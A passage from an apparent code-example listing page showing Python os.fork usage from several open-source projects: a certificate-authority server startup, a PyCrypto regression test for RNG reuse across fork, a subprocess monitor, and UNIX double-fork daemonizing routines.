            pidfile.write("%d\n" % pid)

        # Rebuild reverse mapping
        from certidude import authority
        for cn, path, buf, cert, signed, expires in authority.list_signed():
            by_serial = os.path.join(config.SIGNED_BY_SERIAL_DIR, "%040x.pem" % cert.serial_number)
            if not os.path.exists(by_serial):
                click.echo("Linking %s to ../%s.pem" % (by_serial, cn))
                os.symlink("../%s.pem" % cn, by_serial)

        push.publish("server-started")
        logger.debug("Started Certidude at %s", const.FQDN)

        if fork and config.OCSP_SUBNETS:
            click.echo("OCSP responder subnets: %s" % config.OCSP_SUBNETS)
            if ResponderApp().fork():
                return
        if fork and config.CRL_SUBNETS:
            click.echo("CRL subnets: %s" % config.CRL_SUBNETS)
            if RevocationListApp().fork():
                return
        if fork:
            if BuilderApp().fork():
                return
        if fork and config.LOGGING_BACKEND == "sql":
            if LogApp().fork():
                return

        ReadWriteApp().run()
        push.publish("server-stopped")
        logger.debug("Shutting down Certidude API backend")
        return 
Example 75
Project: Repobot   Author: Desgard   File: test__UserFriendlyRNG.py    MIT License 4 votes vote down vote up
def runTest(self):
        # Regression test for CVE-2013-1445.  We had a bug where, under the
        # right conditions, two processes might see the same random sequence.

        if sys.platform.startswith('win'):  # windows can't fork
            assert not hasattr(os, 'fork')    # ... right?
            return

        # Wait 150 ms so that we don't trigger the rate-limit prematurely.
        time.sleep(0.15)

        reseed_count_before = self._get_reseed_count()

        # One or both of these calls together should trigger a reseed right here.
        Crypto.Random._UserFriendlyRNG._get_singleton().reinit()
        Crypto.Random.get_random_bytes(1)

        reseed_count_after = self._get_reseed_count()
        self.assertNotEqual(reseed_count_before, reseed_count_after)  # sanity check: test should reseed parent before forking

        rfiles = []
        for i in range(10):
            rfd, wfd = os.pipe()
            if os.fork() == 0:
                # child
                os.close(rfd)
                f = os.fdopen(wfd, "wb")

                Crypto.Random.atfork()

                data = Crypto.Random.get_random_bytes(16)

                f.write(data)
                f.close()
                os._exit(0)
            # parent
            os.close(wfd)
            rfiles.append(os.fdopen(rfd, "rb"))

        results = []
        results_dict = {}
        for f in rfiles:
            data = binascii.hexlify(f.read())
            results.append(data)
            results_dict[data] = 1
            f.close()

        if len(results) != len(list(results_dict.keys())):
            raise AssertionError("RNG output duplicated across fork():\n%s" %
                                 (pprint.pformat(results)))


# For RNGMultiprocessingForkTest 
Example 76
Project: wok   Author: bbglab   File: monproc.py    GNU General Public License v3.0 4 votes vote down vote up
def call(cmd, env = None, shell = False, stats = None, interval = 10, logout = False, logerr = False, logtimestamp = False, name = ""):

	if logout:
		r, w = os.pipe()
		outr = os.fdopen(r, "r")
		outw = os.fdopen(w, "w")
	else:
		outw = sys.stdout

	if logerr:
		r, w = os.pipe()
		errr = os.fdopen(r, "r")
		errw = os.fdopen(w, "w")
	else:
		errw = sys.stderr

	pid = os.fork()
	if pid == 0:
		__run_child(cmd, env, outw, errw)

	if stats is not None:
		pool = mp.Pool(1)
		max_mem = pool.apply_async(__monproc, (pid, stats, interval, ))

	if logout:
		outp = mp.Process(name = "%s-logout" % name, target = __logproc, args = (pid, outr, sys.stdout, logtimestamp))
		outp.start()

	if logerr:
		errp = mp.Process(name = "%s-logerr" % name, target = __logproc, args = (pid, errr, sys.stderr, logtimestamp))
		errp.start()

	exit_code = os.waitpid(pid, 0)[1] >> 8

	stats_results = {}

	if stats is not None:
		mem = max_mem.get()
		stats_results["max_vms"] = mem[0]
		stats_results["max_rss"] = mem[1]
		stats_results["max_vms_h"] = __hmem(mem[0])
		stats_results["max_rss_h"] = __hmem(mem[1])

	if logout:
		outp.terminate()
		outp.join()

	if logerr:
		errp.terminate()
		errp.join()

	return (exit_code, stats_results) 
Example 77
Project: gist-alfred   Author: danielecook   File: background.py    MIT License 4 votes vote down vote up
def _background(pidfile, stdin='/dev/null', stdout='/dev/null',
                stderr='/dev/null'):  # pragma: no cover
    """Fork the current process into a background daemon.

    :param pidfile: file to write PID of daemon process to.
    :type pidfile: filepath
    :param stdin: where to read input
    :type stdin: filepath
    :param stdout: where to write stdout output
    :type stdout: filepath
    :param stderr: where to write stderr output
    :type stderr: filepath

    """
    def _fork_and_exit_parent(errmsg, wait=False, write=False):
        try:
            pid = os.fork()
            if pid > 0:
                if write:  # write PID of child process to `pidfile`
                    tmp = pidfile + '.tmp'
                    with open(tmp, 'wb') as fp:
                        fp.write(str(pid))
                    os.rename(tmp, pidfile)
                if wait:  # wait for child process to exit
                    os.waitpid(pid, 0)
                os._exit(0)
        except OSError as err:
            _log().critical('%s: (%d) %s', errmsg, err.errno, err.strerror)
            raise err

    # Do first fork and wait for second fork to finish.
    _fork_and_exit_parent('fork #1 failed', wait=True)

    # Decouple from parent environment.
    os.chdir(wf().workflowdir)
    os.setsid()

    # Do second fork and write PID to pidfile.
    _fork_and_exit_parent('fork #2 failed', write=True)

    # Now I am a daemon!
    # Redirect standard file descriptors.
    si = open(stdin, 'r', 0)
    so = open(stdout, 'a+', 0)
    se = open(stderr, 'a+', 0)
    if hasattr(sys.stdin, 'fileno'):
        os.dup2(si.fileno(), sys.stdin.fileno())
    if hasattr(sys.stdout, 'fileno'):
        os.dup2(so.fileno(), sys.stdout.fileno())
    if hasattr(sys.stderr, 'fileno'):
        os.dup2(se.fileno(), sys.stderr.fileno()) 
Example 78
Project: gist-alfred   Author: danielecook   File: background.py    MIT License 4 votes vote down vote up
def run_in_background(name, args, **kwargs):
    r"""Cache arguments then call this script again via :func:`subprocess.call`.

    :param name: name of job
    :type name: unicode
    :param args: arguments passed as first argument to :func:`subprocess.call`
    :param \**kwargs: keyword arguments to :func:`subprocess.call`
    :returns: exit code of sub-process
    :rtype: int

    When you call this function, it caches its arguments and then calls
    ``background.py`` in a subprocess. The Python subprocess will load the
    cached arguments, fork into the background, and then run the command you
    specified.

    This function will return as soon as the ``background.py`` subprocess has
    forked, returning the exit code of *that* process (i.e. not of the command
    you're trying to run).

    If that process fails, an error will be written to the log file.

    If a process is already running under the same name, this function will
    return immediately and will not run the specified command.

    """
    if is_running(name):
        _log().info('[%s] job already running', name)
        return

    argcache = _arg_cache(name)

    # Cache arguments
    with open(argcache, 'wb') as fp:
        pickle.dump({'args': args, 'kwargs': kwargs}, fp)
        _log().debug('[%s] command cached: %s', name, argcache)

    # Call this script
    cmd = ['/usr/bin/python', __file__, name]
    _log().debug('[%s] passing job to background runner: %r', name, cmd)
    retcode = subprocess.call(cmd)

    if retcode:  # pragma: no cover
        _log().error('[%s] background runner failed with %d', name, retcode)
    else:
        _log().debug('[%s] background job started', name)

    return retcode 
Example 79
Project: gist-alfred   Author: danielecook   File: background.py    MIT License 4 votes vote down vote up
def main(wf):  # pragma: no cover
    """Run command in a background process.

    Load cached arguments, fork into background, then call
    :meth:`subprocess.call` with cached arguments.

    """
    log = wf.logger
    name = wf.args[0]
    argcache = _arg_cache(name)
    if not os.path.exists(argcache):
        msg = '[{0}] command cache not found: {1}'.format(name, argcache)
        log.critical(msg)
        raise IOError(msg)

    # Fork to background and run command
    pidfile = _pid_file(name)
    _background(pidfile)

    # Load cached arguments
    with open(argcache, 'rb') as fp:
        data = pickle.load(fp)

    # Cached arguments
    args = data['args']
    kwargs = data['kwargs']

    # Delete argument cache file
    os.unlink(argcache)

    try:
        # Run the command
        log.debug('[%s] running command: %r', name, args)

        retcode = subprocess.call(args, **kwargs)

        if retcode:
            log.error('[%s] command failed with status %d', name, retcode)
    finally:
        os.unlink(pidfile)

    log.debug('[%s] job complete', name) 
Example 80
Project: hk-news-scrapper   Author: code4hk   File: daemon.py    MIT License 4 votes vote down vote up
def daemonize(self):
        """Daemonize class. UNIX double fork mechanism."""

        try:
            pid = os.fork()
            if pid > 0:
                # exit first parent
                sys.exit(0)
        except OSError as err:
            sys.stderr.write('fork #1 failed: {0}\n'.format(err))
            sys.exit(1)

        # decouple from parent environment
        os.chdir('/')
        os.setsid()
        os.umask(0)

        # do second fork
        try:
            pid = os.fork()
            if pid > 0:
                # exit from second parent
                sys.exit(0)
        except OSError as err:
            sys.stderr.write('fork #2 failed: {0}\n'.format(err))
            sys.exit(1)

        # redirect standard file descriptors
        sys.stdout.flush()
        sys.stderr.flush()
        si = open(os.devnull, 'r')
        so = open(os.devnull, 'a+')
        se = open(os.devnull, 'a+')

        os.dup2(si.fileno(), sys.stdin.fileno())
        os.dup2(so.fileno(), sys.stdout.fileno())
        os.dup2(se.fileno(), sys.stderr.fileno())

        # write pid file
        atexit.register(self.del_pid)

        pid = str(os.getpid())
        with open(self.pid_file, 'w+') as f:
            f.write(pid + '\n')